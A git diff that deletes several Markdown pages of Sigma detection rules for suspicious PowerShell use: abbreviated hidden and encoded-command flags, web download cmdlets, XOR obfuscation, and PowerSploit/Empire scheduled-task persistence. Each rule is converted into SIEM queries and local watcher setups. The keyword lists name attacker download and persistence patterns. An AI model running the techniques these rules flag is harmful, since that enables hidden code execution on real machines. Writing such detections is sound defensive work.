-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\Powershell.exe") -and ($_.message -match " -windowstyle h " -or $_.message -match " -windowstyl h" -or $_.message -match " -windowsty h" -or $_.message -match " -windowst h" -or $_.message -match " -windows h" -or $_.message -match " -windo h" -or $_.message -match " -wind h" -or $_.message -match " -win h" -or $_.message -match " -wi h" -or $_.message -match " -win h " -or $_.message -match " -win hi " -or $_.message -match " -win hid " -or $_.message -match " -win hidd " -or $_.message -match " -win hidde " -or $_.message -match " -NoPr " -or $_.message -match " -NoPro " -or $_.message -match " -NoProf " -or $_.message -match " -NoProfi " -or $_.message -match " -NoProfil " -or $_.message -match " -nonin " -or $_.message -match " -nonint " -or $_.message -match " -noninte " -or $_.message -match " -noninter " -or $_.message -match " -nonintera " -or $_.message -match " -noninterac " -or $_.message -match " -noninteract " -or $_.message -match " -noninteracti " -or $_.message -match " -noninteractiv " -or $_.message -match " -ec " -or $_.message -match " -encodedComman " -or $_.message -match " -encodedComma " -or $_.message -match " -encodedComm " -or $_.message -match " -encodedCom " -or $_.message -match " -encodedCo " -or $_.message -match " -encodedC " -or $_.message -match " -encoded " -or $_.message -match " -encode " -or $_.message -match " -encod " -or $_.message -match " -enco " -or $_.message -match " -en ")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\Powershell.exe) AND winlog.event_data.CommandLine:("\ \-windowstyle\ h\ " OR "\ \-windowstyl\ h" OR "\ \-windowsty\ h" OR "\ \-windowst\ h" OR "\ \-windows\ h" OR "\ \-windo\ h" OR "\ \-wind\ h" OR "\ \-win\ h" OR "\ \-wi\ h" OR "\ \-win\ h\ " OR "\ \-win\ hi\ " OR "\ \-win\ hid\ " OR "\ \-win\ hidd\ " OR "\ \-win\ hidde\ " OR "\ \-NoPr\ " OR "\ \-NoPro\ " OR "\ \-NoProf\ " OR "\ \-NoProfi\ " OR "\ \-NoProfil\ " OR "\ \-nonin\ " OR "\ \-nonint\ " OR "\ \-noninte\ " OR "\ \-noninter\ " OR "\ \-nonintera\ " OR "\ \-noninterac\ " OR "\ \-noninteract\ " OR "\ \-noninteracti\ " OR "\ \-noninteractiv\ " OR "\ \-ec\ " OR "\ \-encodedComman\ " OR "\ \-encodedComma\ " OR "\ \-encodedComm\ " OR "\ \-encodedCom\ " OR "\ \-encodedCo\ " OR "\ \-encodedC\ " OR "\ \-encoded\ " OR "\ \-encode\ " OR "\ \-encod\ " OR "\ \-enco\ " OR "\ \-en\ "))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/36210e0d-5b19-485d-a087-c096088885f0 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious PowerShell Parameter Substring",
-    "description": "Detects suspicious PowerShell invocation with a parameter substring",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\Powershell.exe) AND winlog.event_data.CommandLine:(\"\\ \\-windowstyle\\ h\\ \" OR \"\\ \\-windowstyl\\ h\" OR \"\\ \\-windowsty\\ h\" OR \"\\ \\-windowst\\ h\" OR \"\\ \\-windows\\ h\" OR \"\\ \\-windo\\ h\" OR \"\\ \\-wind\\ h\" OR \"\\ \\-win\\ h\" OR \"\\ \\-wi\\ h\" OR \"\\ \\-win\\ h\\ \" OR \"\\ \\-win\\ hi\\ \" OR \"\\ \\-win\\ hid\\ \" OR \"\\ \\-win\\ hidd\\ \" OR \"\\ \\-win\\ hidde\\ \" OR \"\\ \\-NoPr\\ \" OR \"\\ \\-NoPro\\ \" OR \"\\ \\-NoProf\\ \" OR \"\\ \\-NoProfi\\ \" OR \"\\ \\-NoProfil\\ \" OR \"\\ \\-nonin\\ \" OR \"\\ \\-nonint\\ \" OR \"\\ \\-noninte\\ \" OR \"\\ \\-noninter\\ \" OR \"\\ \\-nonintera\\ \" OR \"\\ \\-noninterac\\ \" OR \"\\ \\-noninteract\\ \" OR \"\\ \\-noninteracti\\ \" OR \"\\ \\-noninteractiv\\ \" OR \"\\ \\-ec\\ \" OR \"\\ \\-encodedComman\\ \" OR \"\\ \\-encodedComma\\ \" OR \"\\ \\-encodedComm\\ \" OR \"\\ \\-encodedCom\\ \" OR \"\\ \\-encodedCo\\ \" OR \"\\ \\-encodedC\\ \" OR \"\\ \\-encoded\\ \" OR \"\\ \\-encode\\ \" OR \"\\ \\-encod\\ \" OR \"\\ \\-enco\\ \" OR \"\\ \\-en\\ \"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\Powershell.exe) AND winlog.event_data.CommandLine:(\"\\ \\-windowstyle\\ h\\ \" OR \"\\ \\-windowstyl\\ h\" OR \"\\ \\-windowsty\\ h\" OR \"\\ \\-windowst\\ h\" OR \"\\ \\-windows\\ h\" OR \"\\ \\-windo\\ h\" OR \"\\ \\-wind\\ h\" OR \"\\ \\-win\\ h\" OR \"\\ \\-wi\\ h\" OR \"\\ \\-win\\ h\\ \" OR \"\\ \\-win\\ hi\\ \" OR \"\\ \\-win\\ hid\\ \" OR \"\\ \\-win\\ hidd\\ \" OR \"\\ \\-win\\ hidde\\ \" OR \"\\ \\-NoPr\\ \" OR \"\\ \\-NoPro\\ \" OR \"\\ \\-NoProf\\ \" OR \"\\ \\-NoProfi\\ \" OR \"\\ \\-NoProfil\\ \" OR \"\\ \\-nonin\\ \" OR \"\\ \\-nonint\\ \" OR \"\\ \\-noninte\\ \" OR \"\\ \\-noninter\\ \" OR \"\\ \\-nonintera\\ \" OR \"\\ \\-noninterac\\ \" OR \"\\ \\-noninteract\\ \" OR \"\\ \\-noninteracti\\ \" OR \"\\ \\-noninteractiv\\ \" OR \"\\ \\-ec\\ \" OR \"\\ \\-encodedComman\\ \" OR \"\\ \\-encodedComma\\ \" OR \"\\ \\-encodedComm\\ \" OR \"\\ \\-encodedCom\\ \" OR \"\\ \\-encodedCo\\ \" OR \"\\ \\-encodedC\\ \" OR \"\\ \\-encoded\\ \" OR \"\\ \\-encode\\ \" OR \"\\ \\-encod\\ \" OR \"\\ \\-enco\\ \" OR \"\\ \\-en\\ \"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious PowerShell Parameter Substring'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\Powershell.exe) AND CommandLine:(" \-windowstyle h " " \-windowstyl h" " \-windowsty h" " \-windowst h" " \-windows h" " \-windo h" " \-wind h" " \-win h" " \-wi h" " \-win h " " \-win hi " " \-win hid " " \-win hidd " " \-win hidde " " \-NoPr " " \-NoPro " " \-NoProf " " \-NoProfi " " \-NoProfil " " \-nonin " " \-nonint " " \-noninte " " \-noninter " " \-nonintera " " \-noninterac " " \-noninteract " " \-noninteracti " " \-noninteractiv " " \-ec " " \-encodedComman " " \-encodedComma " " \-encodedComm " " \-encodedCom " " \-encodedCo " " \-encodedC " " \-encoded " " \-encode " " \-encod " " \-enco " " \-en "))
-```
-
-
-### splunk
-    
-```
-((Image="*\\Powershell.exe") (CommandLine=" -windowstyle h " OR CommandLine=" -windowstyl h" OR CommandLine=" -windowsty h" OR CommandLine=" -windowst h" OR CommandLine=" -windows h" OR CommandLine=" -windo h" OR CommandLine=" -wind h" OR CommandLine=" -win h" OR CommandLine=" -wi h" OR CommandLine=" -win h " OR CommandLine=" -win hi " OR CommandLine=" -win hid " OR CommandLine=" -win hidd " OR CommandLine=" -win hidde " OR CommandLine=" -NoPr " OR CommandLine=" -NoPro " OR CommandLine=" -NoProf " OR CommandLine=" -NoProfi " OR CommandLine=" -NoProfil " OR CommandLine=" -nonin " OR CommandLine=" -nonint " OR CommandLine=" -noninte " OR CommandLine=" -noninter " OR CommandLine=" -nonintera " OR CommandLine=" -noninterac " OR CommandLine=" -noninteract " OR CommandLine=" -noninteracti " OR CommandLine=" -noninteractiv " OR CommandLine=" -ec " OR CommandLine=" -encodedComman " OR CommandLine=" -encodedComma " OR CommandLine=" -encodedComm " OR CommandLine=" -encodedCom " OR CommandLine=" -encodedCo " OR CommandLine=" -encodedC " OR CommandLine=" -encoded " OR CommandLine=" -encode " OR CommandLine=" -encod " OR CommandLine=" -enco " OR CommandLine=" -en "))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\Powershell.exe"] CommandLine IN [" -windowstyle h ", " -windowstyl h", " -windowsty h", " -windowst h", " -windows h", " -windo h", " -wind h", " -win h", " -wi h", " -win h ", " -win hi ", " -win hid ", " -win hidd ", " -win hidde ", " -NoPr ", " -NoPro ", " -NoProf ", " -NoProfi ", " -NoProfil ", " -nonin ", " -nonint ", " -noninte ", " -noninter ", " -nonintera ", " -noninterac ", " -noninteract ", " -noninteracti ", " -noninteractiv ", " -ec ", " -encodedComman ", " -encodedComma ", " -encodedComm ", " -encodedCom ", " -encodedCo ", " -encodedC ", " -encoded ", " -encode ", " -encod ", " -enco ", " -en "])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\Powershell\.exe))(?=.*(?:.* -windowstyle h |.* -windowstyl h|.* -windowsty h|.* -windowst h|.* -windows h|.* -windo h|.* -wind h|.* -win h|.* -wi h|.* -win h |.* -win hi |.* -win hid |.* -win hidd |.* -win hidde |.* -NoPr |.* -NoPro |.* -NoProf |.* -NoProfi |.* -NoProfil |.* -nonin |.* -nonint |.* -noninte |.* -noninter |.* -nonintera |.* -noninterac |.* -noninteract |.* -noninteracti |.* -noninteractiv |.* -ec |.* -encodedComman |.* -encodedComma |.* -encodedComm |.* -encodedCom |.* -encodedCo |.* -encodedC |.* -encoded |.* -encode |.* -encod |.* -enco |.* -en )))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_web_request.md b/Atomic_Threat_Coverage/Detection_Rules/win_powershell_web_request.md
deleted file mode 100644
index 6c9f85a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_web_request.md
+++ /dev/null
@@ -1,280 +0,0 @@
-| Title                    | Windows PowerShell Web Request       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the use of various web request methods (including aliases) via Windows PowerShell |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/](https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/)</li><li>[https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell](https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell)</li></ul>  |
-| **Author**               | James Pemberton / @4A616D6573 |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: Windows PowerShell Web Request
-id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d
-status: experimental
-description: Detects the use of various web request methods (including aliases) via Windows PowerShell
-references:
-    - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/
-    - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
-author: James Pemberton / @4A616D6573
-date: 2019/10/24
-tags:
-    - attack.execution
-    - attack.t1059
-    - attack.t1086
-detection:
-    condition: selection
-falsepositives:
-    - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.
-level: medium
----
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains:
-            - 'Invoke-WebRequest'
-            - 'iwr '
-            - 'wget '
-            - 'curl '
-            - 'Net.WebClient'
-            - 'Start-BitsTransfer'
----
-logsource:
-    product: windows
-    service: powershell
-detection:
-    selection:
-        EventID: 4104
-        ScriptBlockText|contains:
-            - 'Invoke-WebRequest'
-            - 'iwr '
-            - 'wget '
-            - 'curl '
-            - 'Net.WebClient'
-            - 'Start-BitsTransfer'
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*Invoke-WebRequest.*" -or $_.message -match "CommandLine.*.*iwr .*" -or $_.message -match "CommandLine.*.*wget .*" -or $_.message -match "CommandLine.*.*curl .*" -or $_.message -match "CommandLine.*.*Net.WebClient.*" -or $_.message -match "CommandLine.*.*Start-BitsTransfer.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {($_.ID -eq "4104" -and ($_.message -match "ScriptBlockText.*.*Invoke-WebRequest.*" -or $_.message -match "ScriptBlockText.*.*iwr .*" -or $_.message -match "ScriptBlockText.*.*wget .*" -or $_.message -match "ScriptBlockText.*.*curl .*" -or $_.message -match "ScriptBlockText.*.*Net.WebClient.*" -or $_.message -match "ScriptBlockText.*.*Start-BitsTransfer.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*Invoke\-WebRequest* OR *iwr\ * OR *wget\ * OR *curl\ * OR *Net.WebClient* OR *Start\-BitsTransfer*)
-(winlog.event_id:"4104" AND ScriptBlockText.keyword:(*Invoke\-WebRequest* OR *iwr\ * OR *wget\ * OR *curl\ * OR *Net.WebClient* OR *Start\-BitsTransfer*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d <<EOF
-{
-  "metadata": {
-    "title": "Windows PowerShell Web Request",
-    "description": "Detects the use of various web request methods (including aliases) via Windows PowerShell",
-    "tags": [
-      "attack.execution",
-      "attack.t1059",
-      "attack.t1086"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*Invoke\\-WebRequest* OR *iwr\\ * OR *wget\\ * OR *curl\\ * OR *Net.WebClient* OR *Start\\-BitsTransfer*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*Invoke\\-WebRequest* OR *iwr\\ * OR *wget\\ * OR *curl\\ * OR *Net.WebClient* OR *Start\\-BitsTransfer*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Windows PowerShell Web Request'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d-2 <<EOF
-{
-  "metadata": {
-    "title": "Windows PowerShell Web Request",
-    "description": "Detects the use of various web request methods (including aliases) via Windows PowerShell",
-    "tags": [
-      "attack.execution",
-      "attack.t1059",
-      "attack.t1086"
-    ],
-    "query": "(winlog.event_id:\"4104\" AND ScriptBlockText.keyword:(*Invoke\\-WebRequest* OR *iwr\\ * OR *wget\\ * OR *curl\\ * OR *Net.WebClient* OR *Start\\-BitsTransfer*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"4104\" AND ScriptBlockText.keyword:(*Invoke\\-WebRequest* OR *iwr\\ * OR *wget\\ * OR *curl\\ * OR *Net.WebClient* OR *Start\\-BitsTransfer*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Windows PowerShell Web Request'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*Invoke\-WebRequest* *iwr * *wget * *curl * *Net.WebClient* *Start\-BitsTransfer*)
-(EventID:"4104" AND ScriptBlockText.keyword:(*Invoke\-WebRequest* *iwr * *wget * *curl * *Net.WebClient* *Start\-BitsTransfer*))
-```
-
-
-### splunk
-    
-```
-(CommandLine="*Invoke-WebRequest*" OR CommandLine="*iwr *" OR CommandLine="*wget *" OR CommandLine="*curl *" OR CommandLine="*Net.WebClient*" OR CommandLine="*Start-BitsTransfer*")
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode="4104" (ScriptBlockText="*Invoke-WebRequest*" OR ScriptBlockText="*iwr *" OR ScriptBlockText="*wget *" OR ScriptBlockText="*curl *" OR ScriptBlockText="*Net.WebClient*" OR ScriptBlockText="*Start-BitsTransfer*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*Invoke-WebRequest*", "*iwr *", "*wget *", "*curl *", "*Net.WebClient*", "*Start-BitsTransfer*"])
-(event_id="4104" ScriptBlockText IN ["*Invoke-WebRequest*", "*iwr *", "*wget *", "*curl *", "*Net.WebClient*", "*Start-BitsTransfer*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*Invoke-WebRequest.*|.*.*iwr .*|.*.*wget .*|.*.*curl .*|.*.*Net\.WebClient.*|.*.*Start-BitsTransfer.*)'
-grep -P '^(?:.*(?=.*4104)(?=.*(?:.*.*Invoke-WebRequest.*|.*.*iwr .*|.*.*wget .*|.*.*curl .*|.*.*Net\.WebClient.*|.*.*Start-BitsTransfer.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_xor_commandline.md b/Atomic_Threat_Coverage/Detection_Rules/win_powershell_xor_commandline.md
deleted file mode 100644
index 1f06cd3..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_powershell_xor_commandline.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Suspicious XOR Encoded PowerShell Command Line       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Sami Ruohonen, Harish Segar (improvement) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious XOR Encoded PowerShell Command Line
-id: bb780e0c-16cf-4383-8383-1e5471db6cf9
-description: Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.
-status: experimental
-author: Sami Ruohonen, Harish Segar (improvement)
-date: 2018/09/05
-modified: 2020/06/29
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        - Description: "Windows PowerShell"
-        - Product: "PowerShell Core 6"
-    filter:
-        CommandLine|contains:
-            - "bxor"
-            - "join"
-            - "char"
-    condition: selection and filter
-falsepositives:
-    - unknown
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Description.*Windows PowerShell" -or $_.message -match "Product.*PowerShell Core 6") -and ($_.message -match "CommandLine.*.*bxor.*" -or $_.message -match "CommandLine.*.*join.*" -or $_.message -match "CommandLine.*.*char.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Description:"Windows\ PowerShell" OR Product:"PowerShell\ Core\ 6") AND winlog.event_data.CommandLine.keyword:(*bxor* OR *join* OR *char*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/bb780e0c-16cf-4383-8383-1e5471db6cf9 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious XOR Encoded PowerShell Command Line",
-    "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "((winlog.event_data.Description:\"Windows\\ PowerShell\" OR Product:\"PowerShell\\ Core\\ 6\") AND winlog.event_data.CommandLine.keyword:(*bxor* OR *join* OR *char*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Description:\"Windows\\ PowerShell\" OR Product:\"PowerShell\\ Core\\ 6\") AND winlog.event_data.CommandLine.keyword:(*bxor* OR *join* OR *char*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious XOR Encoded PowerShell Command Line'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Description:"Windows PowerShell" OR Product:"PowerShell Core 6") AND CommandLine.keyword:(*bxor* *join* *char*))
-```
-
-
-### splunk
-    
-```
-((Description="Windows PowerShell" OR Product="PowerShell Core 6") (CommandLine="*bxor*" OR CommandLine="*join*" OR CommandLine="*char*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Description="Windows PowerShell" OR Product="PowerShell Core 6") CommandLine IN ["*bxor*", "*join*", "*char*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?:.*Windows PowerShell|.*PowerShell Core 6)))(?=.*(?:.*.*bxor.*|.*.*join.*|.*.*char.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_powersploit_empire_schtasks.md b/Atomic_Threat_Coverage/Detection_Rules/win_powersploit_empire_schtasks.md
deleted file mode 100644
index 84bc219..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_powersploit_empire_schtasks.md
+++ /dev/null
@@ -1,198 +0,0 @@
-| Title                    | Default PowerSploit and Empire Schtasks Persistence       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the creation of a schtask via PowerSploit or Empire Default Configuration. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1053: Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)</li><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>False positives are possible, depends on organisation and processes</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1](https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1)</li><li>[https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/userland/schtasks.py](https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/userland/schtasks.py)</li><li>[https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/elevated/schtasks.py](https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/elevated/schtasks.py)</li></ul>  |
-| **Author**               | Markus Neis, @Karneades |
-| Other Tags           | <ul><li>attack.s0111</li><li>attack.g0022</li><li>attack.g0060</li><li>car.2013-08-001</li><li>attack.t1053.005</li><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Default PowerSploit and Empire Schtasks Persistence
-id: 56c217c3-2de2-479b-990f-5c109ba8458f
-status: experimental
-description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
-references:
-    - https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1
-    - https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/userland/schtasks.py
-    - https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/persistence/elevated/schtasks.py
-author: Markus Neis, @Karneades
-date: 2018/03/06
-logsource:
-    product: windows
-    category: process_creation
-detection:
-    selection:
-        ParentImage:
-            - '*\powershell.exe'
-        CommandLine:
-            - '*schtasks*/Create*/SC *ONLOGON*/TN *Updater*/TR *powershell*'
-            - '*schtasks*/Create*/SC *DAILY*/TN *Updater*/TR *powershell*'
-            - '*schtasks*/Create*/SC *ONIDLE*/TN *Updater*/TR *powershell*'
-            - '*schtasks*/Create*/SC *Updater*/TN *Updater*/TR *powershell*'
-    condition: selection
-tags:
-    - attack.execution
-    - attack.persistence
-    - attack.privilege_escalation
-    - attack.t1053
-    - attack.t1086
-    - attack.s0111
-    - attack.g0022
-    - attack.g0060
-    - car.2013-08-001
-    - attack.t1053.005
-    - attack.t1059.001
-falsepositives:
-    - False positives are possible, depends on organisation and processes
-level: high
-
-```
-
-
-
-
-
